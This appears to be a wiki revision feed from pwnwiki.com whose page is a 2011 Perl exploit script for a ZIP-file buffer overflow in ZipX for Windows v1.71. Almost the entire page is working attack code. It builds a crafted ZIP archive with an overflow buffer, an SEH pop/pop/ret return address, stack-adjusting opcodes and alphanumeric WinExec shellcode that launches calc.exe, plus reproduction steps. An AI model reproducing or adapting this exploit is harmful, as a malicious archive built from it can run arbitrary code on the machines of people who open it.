https://pwnwiki.com/index.php?action=history&feed=atom&title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
ZipX for Windows v1.71 ZIP文件緩衝區溢出漏洞 - Revision history
2026-04-13T09:09:24Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=705&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/perl # #[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit #[+]Date: 05\09\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: htt..."
2021-03-27T03:12:25Z
<p>Created page with "==EXP== <pre> #!/usr/bin/perl # #[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit #[+]Date: 05\09\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: htt..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
#!/usr/bin/perl<br />
#<br />
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit<br />
#[+]Date: 05\09\2011<br />
#[+]Author: C4SS!0 G0M3S<br />
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html<br />
#[+]Version: v1.71<br />
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese<br />
#[+]CVE: N/A<br />
#<br />
#<br />
#Reproduce:<br />
#Open the zip file, after click in "Encrypt", type you password and click in "Ok" BOOM!!!<br />
#See the calc.exe<br />
#<br />
<br />
<br />
use strict;<br />
use warnings;<br />
<br />
my $filename = "Exploit.zip";<br />
<br />
print "\n\n\t\tZipX for Windows v1.71 ZIP File Buffer Overflow Exploit\n";<br />
print "\t\tCreated by C4SS!0 G0M3S\n";<br />
print "\t\tE-mail louredo_\@hotmail.com\n";<br />
print "\t\tSite http://net-fuzzer.blogspot.com/\n\n";<br />
sleep(1);<br />
<br />
print "\t\t[+]Creating ZIP File...\n";<br />
sleep(1);<br />
my $head = "\x50\x4B\x03\x04\x14\x00\x00".<br />
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .<br />
"\x00\x00\x00\x00\x00\x00\x00\x00" .<br />
"\xe4\x0f" .<br />
"\x00\x00\x00";<br />
<br />
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".<br />
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .<br />
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".<br />
"\xe4\x0f".<br />
"\x00\x00\x00\x00\x00\x00\x01\x00".<br />
"\x24\x00\x00\x00\x00\x00\x00\x00";<br />
<br />
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".<br />
"\x00\x01\x00\x01\x00".<br />
"\x12\x10\x00\x00".<br />
"\x02\x10\x00\x00".<br />
"\x00\x00";<br />
<br />
my $shellcode =<br />
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUK" .<br />
"VPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMM" .<br />
"PV261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7Z" . # Shellcode WinExec "calc.exe"<br />
"UXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWW" . # Alpha Numeric Shellcode BaseAddress EAX<br />
"LNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1" .<br />
"BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWNKRKJ8JSNS4YMMOHT3Z" .<br />
"QJOHQ4QJUQLN1VSLV5S1QYO0YA";<br />
my $payload = "A" x 330;<br />
$payload .=<br />
("\x66\x05\x4D\xCD" x 4).<br />
"\x66\x05\x19\x18". # ADD AX,1819<br />
"\x54\x5A\x50\x5B". # PUSH ESP # POP EDX # PUSH EAX # POP EBX<br />
"\x2B\xE0". # Afer convertion SUB EDX,EBX<br />
"\x52\x58". # PUSH EDX # POP EAX<br />
"\x98\xd1"; # CALL EAX<br />
$payload .= "C" x (371-length($payload));<br />
$payload .= "\x3C\x01\x75\xd1"; # Converted is that "\x3c\x04\x75\xd0"<br />
$payload .= pack('V',0x0041334d); # P/P/RET<br />
$payload .= $shellcode;<br />
$payload .= "B" x (4064-length($payload));<br />
$payload = $payload.".rar";<br />
my $zip = $head.$payload.$head2.$payload.$head3;<br />
open(FILE,">$filename") || die "\t\t[-]Error:\n$!\n";<br />
print FILE $zip;<br />
close(FILE);<br />
print "\t\t[+] ZIP File Created With Sucess:)\n";<br />
sleep(3);<br />
</pre></div>
Pwnwiki